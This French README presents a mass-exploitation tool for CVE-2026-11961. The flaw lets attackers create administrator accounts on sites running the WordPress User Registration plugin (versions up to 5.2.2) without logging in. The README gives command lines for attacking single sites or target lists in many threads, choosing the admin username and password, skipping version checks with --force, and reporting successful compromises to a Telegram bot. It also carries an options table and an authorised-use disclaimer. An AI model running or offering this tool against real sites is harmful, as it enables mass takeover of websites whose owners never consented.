
CVE-2026-11961 — UserRegistration : WordPress User Registration <= 5.2.2 Élévation de privilèges. Rôles d'adhésion mal configurés → Création d'administrateur non authentifiée → Compromission du site. CVSS 8.1
Outil d'exploitation massive pour CVE-2026-11961 affectant le plugin WordPress User Registration & Membership.
--force)# Afficher l'aide
python3 mass.py -h
# Cible unique
python3 mass.py -u https://target.com
# Cible unique avec identifiants personnalisés
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# Cibles multiples
python3 mass.py -l targets.txt -t 20
# Enregistrer les résultats réussis
python3 mass.py -l targets.txt -o results.jsonl
# Écrire un fichier journal
python3 mass.py -l targets.txt --log exploit.log
# Notifications Telegram
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# Mode force
python3 mass.py -u https://target.com --force
Ce projet est fourni uniquement pour des évaluations de sécurité autorisées, la recherche en sécurité défensive et la validation de vulnérabilités.
En utilisant ce logiciel, vous confirmez que vous disposez d'une autorisation explicite pour évaluer les systèmes cibles. L'accès non autorisé à des systèmes informatiques est interdit et peut enfreindre les lois applicables.
L'auteur et les contributeurs n'encouragent ni n'approuvent l'utilisation non autorisée de ce projet et déclinent toute responsabilité en cas d'utilisation abusive, de dommages ou de conséquences juridiques résultant de son utilisation.
JohenLastGen JLG NETWORK
| Option | Description |
|---|
-h, --help | Afficher le message d'aide et quitter |
-u, --url | URL d'une cible unique |
-l, --list | Fichier contenant les URL des cibles (une par ligne) |
--username | Nom d'utilisateur administrateur (par défaut : généré aléatoirement) |
--password | Mot de passe administrateur (par défaut : généré aléatoirement) |
-t, --threads | Nombre de threads simultanés (par défaut : 5) |
--timeout | Délai d'expiration des requêtes en secondes (par défaut : 15) |
-o, --output | Enregistrer les résultats réussis dans un fichier JSONL |
--log | Enregistrer les journaux de la console dans un fichier |
--proxy | Proxy HTTP/HTTPS (ex. http://127.0.0.1:8080) |
--force | Ignorer la validation de la version et continuer le traitement |
--tg-token | Jeton du bot Telegram |
--tg-chat | Identifiant du chat Telegram |